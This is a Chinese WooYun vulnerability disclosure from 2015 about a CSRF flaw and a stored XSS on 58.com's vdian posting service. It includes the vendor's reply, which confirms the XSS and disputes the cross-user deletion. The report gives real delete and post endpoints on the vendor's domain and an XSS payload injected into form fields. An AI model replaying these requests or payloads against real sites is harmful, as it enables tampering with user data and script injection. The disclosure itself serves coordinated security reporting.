当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098469

漏洞标题:58同城某核心业务csrf可删除任意简历+存储型xss一枚(非self-xss)

相关厂商:58同城

漏洞作者: 小龙

提交时间:2015-02-27 09:53

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

啊啊,这种赚钱的系统安全别做那么差嘛,一个cookie也是用户的,别泄漏啦o(∩_∩)o

详细说明:

直接访问:http://vdian.vip.58.com/info/delete/要删除的IDccateId


1.png


2.png


测试:

http://vdian.vip.58.com/info/delete/21113736622083


3.png


4.png


居然有一条没了,哈哈
还有csrf
http://vdian.vip.58.com/info/post

post请求数据:infoImage=&desc=wooyun&price=wooyun1&unit=wooyun2


本来这个xss挺鸡肋的,但是有了csrf这个就不再鸡肋了
<a target="_blank" href=" WooYun: 天涯CSRF系列三: 结合储存型XSS定向删除指定用户微博(非越权) ">WooYun: 天涯CSRF系列三: 结合储存型XSS定向删除指定用户微博(非越权))</a> <br />
我们post这样的数据过去:

post请求数据:infoImage=test"><img src=/ onerror="alert( 1 )&desc=wooyun&price=test"><img src=/ onerror="alert( 1 )&unit=test"><img src=/ onerror="alert( 1 )


5.png


火狐浏览器

6.png


橘子浏览器:

7.png


IE浏览器

8.png


QQ浏览器

9.png


漏洞证明:

http://vdian.vip.58.com/info/detail/21114396631301?from=postsuccess


修复方案:

过滤特殊符号

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-02-27 10:39

厂商回复:

删除的请求只能删除自己的发布的帖子,有做判断,无法平行权限删除其它用户发布的。存储XSS漏洞确实存在,会尽快修复处理,感谢对58安全的关注!

最新状态:

暂无